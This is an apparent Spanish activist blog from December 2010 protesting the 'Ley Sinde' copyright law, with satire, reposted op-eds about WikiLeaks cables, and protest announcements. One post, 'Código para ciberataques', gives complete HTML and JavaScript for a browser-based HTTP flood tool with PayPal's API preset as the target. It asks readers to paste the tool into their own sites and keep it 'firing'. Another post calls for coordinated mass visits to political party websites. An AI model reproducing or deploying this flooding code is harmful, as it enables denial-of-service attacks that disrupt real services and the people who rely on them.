    • Ramoncin+no pagar impuestos= Alejandro Sanz
    • Alejandro Sanz intentó tributar en España pero no se atrevió a descargarse el programa PADRE por si era delito.
    • Cada vez que alguien descarga un disco de Alejandro Sanz muere un animal en peligro de extinción #alejandrosanzfacts #sindegate.

    Sobre Miguel Bose
    • la que le está cayendo a Bosé en fb tampoco es tonteria! ... Que se junte con A.Sanz y hagan una mani!
    • Los de forocoches troleando el Facebook de Miguel Bosé sí que es un DDOS en toda regla. Estos si que dan miedo ;)
    • Comentan que han visto a Bose y Alejandro Sanz coger el ferrari y dar un portazo a mala ostia. #leysinde
    • Propuesta: Gran quema de discos de Ramoncín, Sanz y Bosé (piratas, por supuesto) #sindegate #leysinde.

    Sobre Alex de la Iglesia
    • Álex de la Iglesia arremete contra las telefónicas a unas horas de la votación de la 'Ley Sinde'
    • @AlejandroSanz, Alex de la Iglesia, la Sinde y Ramoncín están jugando al mus. La casa de getxo les ha denunciado por pirateo de dialogos.

    martes, 21 de diciembre de 2010

    La SGAE contra Mozart

    Bonita anécdota que seguro no le han contado a la Sinde

    "Miserere de Allegri, ha sido, con certeza, la obra más exageradamente prohibida de todos los tiempos. Hacia mediados del siglo XVII Gregorio Allegri cumplió el encargo hecho por el Papa Urbano VIII de elaborar una partitura musical para ser única y exclusivamente interpretada en la Capilla Sixtina dos veces al año, una obra coral cuyas notas y voces hubiesen sido sólo pensadas y diseñadas para rebotar en las pinturas de Miguel Ángel. El castigo que amenazaba a quien se atreviera a vulnerar la fantástica prohibición y difundir la obra era la excomunión. Nunca el concepto de propiedad intelectual fue llevado tan lejos y nunca la violación de un copyright tuvo una multa tan extraordinaria y metafísica. Gracias a esta «urbanística» iniciativa, aquel CD post-renacentista permaneció como propiedad exclusiva del coro papal y como celoso secreto de la Iglesia durante más de un siglo. Hasta la madrugada del Miércoles Santo de 1769 en la que Mozart, a la edad de trece años y en un viaje a Roma, lo oye en compañía de su padre y rompe esa ley restrictiva al memorizarlo entero. Lo ha escuchado una sola vez pero al dejar la Capilla Sixtina ya se lleva íntegramente registrados los doce minutos de música en su cabeza (ése sí que era un disco duro y no lo de otros). Por esa bendita infracción, el Miserere de Allegri pudo ser difundido y nos ha llegado intacto. Sin que lo supieran ni el propio Mozart ni su padre, ni la SGAE ni el Gobierno de Zapatero, se acababa de producir la primera descarga ilegal de la Historia.


    La anécdota es muy ilustrativa porque, si Allegri era un gran músico, tampoco Mozart era un mindundi, hecho obvio por el cual queda un tanto salvada la honrilla maltratada del pobre usuario particular de internet que simplemente se descarga una melodía para consumo personal o de los suyos sin ningún ánimo de lucro. No se trata, en fin, del gorrón vulgar y mediocre que trata ilegítimamente de disfrutar del sonoro néctar de la creatividad de un genio. También en ese usuario cabe la capacidad de crear e incluso la genialidad como fue el caso de Mozart sin ir más lejos. Yo es que no sé si se han dado cuenta los señores de la SGAE de que la «propiedad» nunca ha sido un «genuino concepto de izquierdas» y de que un sentido tan rentabilizador y usurero, tan hiperlegalista y burócrata, tan policial e inquisitorial de la propiedad intelectual resulta la cosa más reaccionaria y antisocialista del mundo. Yo no sé si se dan cuenta de la impopularidad que están ganándose a pulso estos peseteros extemporáneos de la Europa del euro que no perdonan al Universo la calderilla y que deben pensar en un «modelo de negocio sostenible» que no sea el «cobro totalitario» ni ese afán de ponerle puertas al campo y al bosque y al mar y al aire.

    Mozart, por cierto, nunca fue excomulgado sino condecorado por su travesura con la insignia pontificia de la Orden de la Espuela de Oro, que, paradójicamente, absolvía a quien la recibiera de cualquier sentencia de excomunión. Clemente XIV era un tipo enrollado. No iba de progre el hombre, pero se dio cuenta de que el mundo había cambiado. No como éstos"
    (Publicado en LA RAZON)

    Internet ha muerto, "LARGA VIDA A INTERNET"

    Hoy es un día de luto. Están a punto de asesinar algo que habíamos pensado que era nuestro. Algo que pensabamos que nos pertenecía. La neutralidad en la red. Hoy día 21 de Diciembre, en un estado de derecho, democrático y en contra de una amplia mayoría, van a proceder al asesinato por la vía rápida y por la puerta de atras de lo que un día conocimos como Internet.

    Un lobby procedente de empresas con una poderosa economía con sede en EEUU han metido sus largos dedos en el gobierno de nuestro país para sacar leyes a su medida y a la de sus bolsillos. Esto no es para nosotros. Es para ellos. Nuestros políticos nos dan la espalda. No nos necesitan para gobernar. Están mejor sin nosotros. Solo molestamos. Igual hasta les tenemos que pedir perdón por todo lo mal que se lo estamos haciendo pasar. Parece que no entendemos que la ley la sacan para nosotros... Si, para nosotros. Para recortar nuestros derechos. Porque algo que un juez repetidas veces ha declarado que no es ilegal, ellos no lo creen así. Y todo por nuestro "bien". No solo les tenemos que pedir perdón, también deberíamos darles las gracias porque el día de hoy lo recordaremos siempre.

    Internet ha muerto, "LARGA VIDA A INTERNET"

    Movilizaciones en la Red:
    http://www.elpais.com/articulo/tecnologia/Movilizacion/Red/ley/Sinde/elpeputec/20101220elpeputec_5/Tes

    http://www.nacionred.com/sociedad-civil-digital/estos-chicos-creen-tener-razones-para-tumbar-hoy-la-web-del-congreso

    http://noticias.lainformacion.com/arte-cultura-y-espectaculos/internet/ataque-masivo-contra-las-webs-de-psoe-ciu-pp-y-pnv-por-la-ley-sinde_1XA7p8IpcZs6EuZ2ptXaY1/

    Wikileaks:
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.elpais.com%2Farticulo%2Fespana%2FCable%2Freunion%2FGonzalez-Sinde%2Fembajador%2FEE%2FUU%2Felpepuesp%2F20101220elpepunac_24%2FTes&sl=en&tl=es

    ministra_Cultura_Angeles_Gonzalez-Sinde.jpg

    La ley Sinde:
    http://muycomputer.com/files/264-30226-FOTO/LeySinde_pdf.JPG

    lunes, 20 de diciembre de 2010

    Movilizaciones contra la Ley Sinde hoy a las 18:00

    Como os hemos venido informando durante estos días mañana día 21 de diciembre se podría aprobar la polémica Ley de Economía Sostenible, pero no mediante el Congreso de los Diputados, sino por un proceso express en una Comisión de Economía, haciendo de este modo que no haya debate alguno entre los diputados y a su vez, desoyendo los deseos de la población contra esta ley.

    Ayer comenzamos a ver las primeras protestas por parte de un grupo de páginas web de enlaces que cerraron durante doce horas para mostrar su oposición a la Ley Sinde que podría estas páginas web en un grave peligro de ser cerradas si la ley es finalmente aprobada. Pero este no es el único movimiento, ya que para hoy se ha convocado a los usuarios para que accedan de forma voluntaria a las páginas web del PSOE y CiU a partir de las 18:00 a estas. El grupo que convoca esta acción señala que se trata de una manifestación legitima contra la aprobación de la ley que atenta contra los derechos de los ciudadanos.



    Visto en: http://alt1040.com/2010/12/movilizaciones-contra-la-ley-sinde-hoy-a-las-1800

    La Ley Sinde o cómo hacer lo que te venga en gana

    La_libertad_guiando_al_pueblo_%25281830%2529.jpg 

    Mañana se aprobará la Ley Sinde. Nadie la quiere, a nadie le gusta, pero es así. Se va a aprobar sin que podamos hacer nada. Todo para el pueblo pero sin el pueblo.

    Enrique Dans:
    "La cuestión resulta curiosa: las comunicaciones reveladas por WikiLeaks son documentos oficiales, de imposible refutación. Quienes las revelan son cinco grandes medios de indudable prestigio, tomados habitualmente como fuentes de toda solvencia: Der Spiegel, El País, Le Monde, The Guardian y The New York Times, que lógicamente han hecho su trabajo de comprobación y verificación de fuentes previo a la publicación. Los documentos implican a personas concretas en acciones específicas y constitutivas de diversos delitos y faltas, algunas de ellas muy graves, cuando no de una absoluta falta de etica e indignidad.
    Conspirar con una potencia extranjera para enterrar las reivindicaciones de la familia de un periodista asesinado, para mentir y engañar con datos falsos con el fin de conseguir una legislación favorable a una serie de intereses comerciales, para perjudicar los intereses de empresas españolas o para la infinidad de temas que las filtraciones de WikiLeaks han ido revelando suponen faltas graves, cuestiones que deberían conllevar el cese de varias personas en sus cargos de manera inmediata y fulminante. Sin embargo, la respuesta unánime de todos los gobiernos y de toda la diplomacia internacional ha sido la del avestruz: enterrar la cabeza en la arena, no decir absolutamente nada, y esperar a que escampe. Que los testimonios revelados por WikiLeaks sean ya conocidos por una inmensa mayoría de ciudadanos escandalizados, que estén copiados en miles de sitios web en todo el mundo o que resulte evidente que no van a ser enterrados por el devenir de la actualidad, sino incluidos en el acervo colectivo de los recuerdos y memorias de la ciudadanía durante generaciones es algo que no detiene su impresentable e incalificable actitud.
    Los gobiernos se han convertido en Don Tancredo: subidos a un pedestal, con la cara pintada, y completamente inmóviles, a la espera de que el toro los ignore, se dé la vuelta y les permita seguir con sus turbios manejos, con toda esa serie de excesos de autoridad que van mucho más allá de aquello para lo que los elegimos, de los poderes que legítimamente les permitimos ejercer. Los gobiernos han decidido olvidar quién los puso ahí, a quién se deben, quién los vota y los designa. Y quién debería tener el legítimo derecho de retirarles la confianza, algo completamente lógico y justificado en virtud de todo lo que hemos podido ver durante estos dias. Si los gobiernos no reaccionan, si deciden adoptar el silencio por toda acción, tomarnos por completos idiotas que no se enteran de la gravedad real de las cosas, los que tenemos que reaccionar somos nosotros, la ciudadanía. No esperar a que, como pretenden, la indignación se pase. No hacer el juego a su absurda estrategia del avestruz. Reaccionar ya. No esperes. Reacciona."

    Los ciudadanos darán sus condolencias al Estado por la muerte de la Libertad de Expresión

    Ante la inminente aprobación mediante una puerta trasera de la por desgracia famosa Ley Sinde, PIRATA realizará, en cuantos Ayuntamientos sea posible, un acto consistente en el entierro simbólico de parte de la libertad que hasta ahora habíamos disfrutado los ciudadanos. Hecho más grave, cuanto este entierro es en gran parte debido a las presiones de un gobierno extranjero, en claro detrimento de la Soberanía Nacional. Depositaremos rosas negras en los Ayuntamientos de toda España, el próximo lunes 20 de diciembre por la tarde a las 19:00. También pondremos rosas negras en nuestras webs, blog y fotos de perfiles de redes sociales.
    Dado que los actos se llevarán a cabo por grupos de menos de 20 personas, no es necesario comunicarlos a la Delegación del Gobierno. Iremos actualizando esta entrada conforme los afiliados de PIRATA repartidos por todo el territorio nacional, vayan confirmando estos actos en cada ayuntamiento.
    Madrid
    Ministerio de Cultura. Plaza del Rey, 1. Palacio de Cibeles, Plaza de Comunicaciones 19:00 <M> Banco de España, Gran Vía o Sevilla.
    Valencia
    Frente a la puerta del Ayuntamiento, Plaza del Ayuntamiento 19:00.

    Material gráfico:


    Visto en http://www.partidopirata.es/blog/los-ciudadanos-daran-sus-condolencias-al-estado-por-la-muerte-de-la-libertad-de-expresion/

    jueves, 16 de diciembre de 2010

    Envía tu mensaje a los diputados

    Rellena el siguiente formulario

    Rellenando el siguiente formulario puedes enviar un mensaje a los diputados/as del congreso español en relación a la aprobación de la Ley Sinde. Escríbeles lo que consideres oportuno pero sé respetuoso, solo de esta manera nuestras peticiones serán escuchadas.

    Nombre:
    E-mail:
    Asunto:
    Mensaje:
    Más información: Activando esto expresas que deseas recibir información sobre futuras acciones.

    Política de Privacidad

    xMailer copyleft Isaac Hacksimov 2009-2010, licencia GPLv3, powered by Hacktivistas.net

    viernes, 10 de diciembre de 2010

    Código para ciberataques

     ATENCIÓN

    COPIA Y PEGA ESTE CODIGO EN TU PÁGINA O BLOG

    NECESITAMOS TU AYUDA

    <h2 style="font-size:15px;color:#1177CC;">
    No necesitas descargar, instalar o configurar absolutamente nada. Tan solo pulsa el botón azul, sientate y disfruta del espectáculo.
    </h2>
    <h2 style="font-size:15px;">
    No need to download, install or setup anything - just click the button, sit and enjoy the show.</h2>
    <div style="width:100%; height:100%;">
    <div style="width:240px; height:100px;">
    <fieldset style="width:100%; height:100%;">
    <legend>Paso 1. Selecciona el objetivo:</legend>
    <label>URL:
    <input id="targetURL" style="width:100%;" value="https://api.paypal.com:443/" /></label>
    <small>Para ver el objetivo actual entra en: <a href="http://anonops.net/" style="color:#FFF;">http://anonops.net/</a></small>

    </fieldset>
    </div>


    <div style="width:240px; height:100px;">
    <fieldset style="width:100%; height:100%;">

    <legend>Pasop 2. ¿Preparado?</legend>
    <button id="fireButton" style="background-color:#336494; border-color:#FFF; color:#FFF; width:240px; height:70px; margin-top:-22px;">Empezar Ataque</button>
    </fieldset>
    </div>


    <div style="width:240px; height:160px;">
    <fieldset style="width:100%; height:100%;">
    <legend>Optional. Options</legend>

    <label>Respuestas por Segundo: <input style="width:40px;" id="rps" value="10" /></label>

    <label>Añade un Mensaje:
    <input style="width:100%;" id="message" value="" /></label>
    </fieldset>
    </div>

    <div style="width:240px; height:160px;">
    <fieldset style="width:100%; height:100%;">
    <legend>Estado del Ataque:</legend>
    <dl>
    <dt>Respuestas:</dt>
    <dd id="requestedCtr">0</dd>
    <dt style="opacity: 0.5">Realizadas con éxito:</dt>
    <dd style="opacity: 0.5" id="succeededCtr">0</dd>
    <dt style="opacity: 0.5">Fallidas:</dt>
    <dd style="opacity: 0.5" id="failedCtr">0</dd>          </dl>
    </fieldset>
    </div>

    <div style="font-size:14px;">
    We need your help in support of <a href="http://wikileaks.ch/" style="color:#1177CC;">wikileaks</a> leave this page firing as long as you can.  Don't worry if requests show as failed.
    </div>

    <div style="font-size:14px;">
    Necesitamos tu ayuda para poder dar soporte a <a href="http://wikileaks.ch/" style="color:#1177CC;">wikileaks</a> deja que la página se lance todo el tiempo que puedas.  No te preocupes si las respuestas aparecen como fallidas.

    Vía <a href="http://213.163.66.134/wikileaks/flood.html" style="color:#1177CC;">http://213.163.66.134/wikileaks/flood.html</a>
    </div>
    </div>
    <script>
            (function () {

                var fireInterval;
                var isFiring = false;

                var requestedCtrNode = document.getElementById("requestedCtr"),
                    succeededCtrNode = document.getElementById("succeededCtr"),
                    failedCtrNode = document.getElementById("failedCtr"),
                    targetURLNode = document.getElementById("targetURL"),
                    fireButton = document.getElementById("fireButton"),
                    messageNode = document.getElementById("message"),
                    rpsNode = document.getElementById("rps"),
                    timeoutNode = document.getElementById("timeout");

                var targetURL = targetURLNode.value;
                targetURLNode.onchange = function () {
                    targetURL = this.value;
                };

                var requestsHT = {}; // requests hash table, may come in handy later

                var requestedCtr = 0,
                    succeededCtr = 0,
                    failedCtr = 0;

                var makeHttpRequest = function () {
       
         if (requestedCtr > failedCtr + succeededCtr + 1000) { //Allow no more than 1000 hung requests
          return;
         };
        
                        var rID =Number(new Date());
                        var img = new Image();
                        img.onerror = function () { onFail(rID); };
                        img.onabort = function () { onFail(rID); };
                        img.onload = function () { onSuccess(rID); }; // TODO: it may never happen if target URL is not an image... // but probably can be fixed with different methods
        
         img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
                        requestsHT[rID] = img;
                        onRequest(rID);
                    };

                var onRequest = function (rID) {
                        requestedCtr++;
                        requestedCtrNode.innerHTML = requestedCtr;
                    };

                var onComplete = function (rID) {
                        delete requestsHT[rID];
                    };

                var onFail = function (rID) {
                       // failedCtr++;
                        //failedCtrNode.innerHTML = failedCtr;
        
         succeededCtr++; //Seems like the url will always fail it it isn't an image
                        succeededCtrNode.innerHTML = succeededCtr;


                        delete requestsHT[rID]; // we can't keep it forever or it would blow up the browser
                    };

                var onSuccess = function (rID) {
                        succeededCtr++;
                        succeededCtrNode.innerHTML = succeededCtr;
                        delete requestsHT[rID];
                    };

                fireButton.onclick = function () {
                    if (isFiring) {
                        clearInterval(fireInterval);

                        isFiring = false;
                        this.innerHTML = "IMMA CHARGING MAH LAZER";
                    } else {
                        isFiring = true;
                        this.innerHTML = "Stop flooding";

                        fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
                    }
                };

            })();
        </script>

    jueves, 9 de diciembre de 2010

    Más mentiras y más gordas

    Por Enrique Dans:

    La lectura de los documentos sobre propiedad intelectual y España revelados por El País es una de actividad francamente recomendable para un político de bien. Particularmente, si ha estado siguiendo minimamente los avatares que han rodeado al intento de cambio legislativo tendente al endurecimiento de todo aquello relacionado con las descargas a traves de Internet, una actividad desarrollada de manera habitual por millones de ciudadanos en todo el mundo y que en nuestro país, como bien podemos leer en esta Circular de la Fiscalía General del Estado, no son delito cuando no conllevan ánimo de lucro directo.

    Si nuestro querido amigo político no ha ido siguiendo este tema, varios cientos de miles de ciudadanos sí lo hemos hecho. Lo hemos hecho con estupor, al ver cómo la música, contrariamente a lo que decían los agoreros, no solo no se moría, sino que parecía más viva y con mejor salud que nunca. Cómo los mayores taquillazos de la industria del cine se daban ahora, y no hace diez años cuando estas tecnologías no existían. Cómo aquellos que sabían adaptarse al nuevo entorno seguían ganando dinero, mientras únicamente determinados intermediarios y fósiles de la industria reclamaban histéricos que todo siguiera igual, a modo de demanda contra natura, de imposible parálisis del tiempo.

    Lo hemos seguido además preocupados, al ver el cariz liberticida que estaba tomando el tema. Al ver como multiples fuerzas, incluidas aquellas que rara vez se alinean entre sí, iban cambiando sus opiniones como si fueran fichas de un dominó, para acabar dando origen a una ley absurda, peligrosa, a la consagración de una auténtica "justicia paralela" que amenazaba con retirar a los jueces la potestad para tomar decisiones sobre los casos relacionados con propiedad intelectual y entregársela a un siniestro organismo administrativo dependiente del propio Ministerio de Cultura, convertido además en "Ministerio de la Industria Cultural". El porqué España tenía dos ministerios de Industria, uno para la industria en general y otro para la industria cultural, era algo que permanecía en el misterio. Por qué España, cuya cultura podría claramente beneficiarse de una gestión de la propiedad intelectual innovadora y avanzada, optaba por querer parecerse a una realidad como la norteamericana, completa y radicalmente diferente en sus circunstancias e intereses, era algo que no cabía en el sentido común. Si todos los jueces, uno detrás de otro, estaban de acuerdo, ¿por qué cambiar de jueces, si lo que decían éstos tenía todo el sentido?

    Finalmente, el misterio se ha revelado: TODO ERA MENTIRA. MENTIRA y GORDA. En realidad, como se desprende claramente de las comunicaciones filtradas por WikiLeaks, todo era parte de un plan maestro en el que España y sus políticos eran meros peones al servicio de una industria, de una serie de empresas norteamericanas. Comprobar hasta qué punto esas industrias, a través de la Embajada, han estado manipulando y amenazando a nuestros políticos es sencillamente sobrecogedor. Ver frases que evidencian ataques a quienes opinan diferente, intentos por cambiar la interpretación que se hace de las leyes locales y pactos internacionales por ser contraria a sus intereses, presiones y amenazas hace que a cualquiera le entre complejo de república bananera.  como la famosa Lista 301, cuya falsedad y uso torticero queda patente, es utilizada como arma para obtener cambios y torcer voluntades es algo que te hace pensar.

    La famosa Ley Sinde era, en realidad, made in USA. Los misteriosos cambios de opinión que pudimos los que, aquellos días de diciembre y enero, tuvimos la oportunidad de reunirnos con diversas fuerzas políticas para explicar nuestra actitud coinciden perfectamente con las presiones ejercidas por la embajada norteamericana, con las fechas de los distintos documentos filtrados, a cada cual más vergonzoso. Es momento de plantearse la responsabilidad de los intermediarios de la industria norteamericana en España, de esos que han estado encargando y dirigiendo informes en los que se calumniaba la imagen de España, haciéndola parecer "el paraíso de las descargas" cuando, en realidad, lo que descarga un español no difiere de lo que descarga un inglés, un francés o un norteamericano. Mentiras destinadas a forzar una acción que les permitiese obtener una legislación más acorde con sus intereses, que les permitiese seguir exprimiendo un mercado inexistente, que murió cuando la red sustituyó al plástico. Mentiras gordas que, además, hemos podido comprobar que venían de una injerencia extranjera, de una presión desarrollada en la oscuridad, de las auténticas cloacas de la política. Todo está muy claro. Hemos sido burdamente manipulados. Y ya no tienen argumentos.

    Se acerca el momento de votar la Ley de Economía Sostenible. Sobre ella, hagan lo que políticamente crean que deban hacer. Pero fuercen la retirada de ese "pegote", de esa Disposición Final que nada pinta ahí y que llegó además de tan mala manera, de forma turbia, por manejos e intrigas palaciegas teledirigidas desde la embajada. Muchos miles de ciudadanos vamos a estar mirando, vigilando atentamente. Y no nos vamos a callar.